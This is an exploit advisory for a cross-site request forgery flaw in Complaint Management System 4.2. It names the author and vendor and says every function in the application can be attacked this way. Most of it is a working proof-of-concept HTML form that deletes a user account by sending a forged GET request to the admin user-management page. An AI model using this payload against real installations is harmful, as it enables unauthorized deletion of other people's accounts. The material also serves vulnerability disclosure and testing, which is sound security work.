# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)# Author: Besim ALTINOK# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/complaint-management-sytem/# Version: v4.2# Tested on: Xampp# Credit: İsmail BOZKURT*************************************************
Detail:
You can perform CSRF Attack forall the functions.----------------------------------------------
CSRF PoC for Delete User
----------------------------------------------
This request performs over the GET request with uid.------------------------------------------------------------------------<html><body><script>history.pushState('','','/')</script><form action="http://localhost/cms/admin/manage-users.php"><inputtype="hidden" name="uid" value="4"/><inputtype="hidden" name="" value=""/><inputtype="hidden" name="action" value="del"/><inputtype="submit" value="Submit request"/></form></body></html>
